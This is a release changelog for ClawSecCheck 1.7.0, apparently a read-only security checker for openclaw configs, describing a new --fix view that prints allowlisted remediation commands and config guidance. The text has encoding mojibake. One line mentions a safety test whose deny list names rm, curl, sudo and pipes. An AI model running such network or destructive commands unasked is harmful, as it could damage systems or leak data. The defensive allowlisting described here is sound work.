ClawSecCheck v1.7.0
Paste-ready remediation (--fix). The exact fix commands were already in each finding's prose;
now they're extracted into a copy-paste block. ClawSecCheck stays read-only β --fix only
prints remediation; it never applies anything (the name promises a check). Config fixes are given
as set <dotted-path> β <value> guidance so you edit your own openclaw.json, never a
paste-over JSON blob that could clobber neighbouring keys.
Added
--fixview β prints paste-ready remediation for current FAIL/WARN findings: exact shell
commands (allowlisted verbs only βchmod/openclaw, no destructive or network commands) and
config path+value guidance. Header states plainly that ClawSecCheck does not apply them.catalog.REMEDIATION+remediation_for(id)β single source of truth, authored only for
checks with a safe, deterministic, grounded fix (config dotted paths verified against the real
schema, Β§4). Checks needing manual review keep their prosefix.--jsonexposes"remediation": {commands, config}per finding; SARIF results carry a
fixesarray (description-only β noartifactChanges, since nothing is auto-edited).
Notes
- Additive only β no verdict, score, or check behaviour changed; grades unchanged on the fixture
corpus. A safety test enforces the command allowlist (norm/curl/sudo/pipes/etc.). - Workspace-specific paths use documented
<placeholder>forms rather than auto-substituting a
path guessed from evidence (neverchmodthe wrong thing, Β§5). - Out of scope (deliberately): an auto-apply
--apply(would need to be opt-in and
confirmation-gated, Β§2) and a paste-over JSON patch (clobber risk).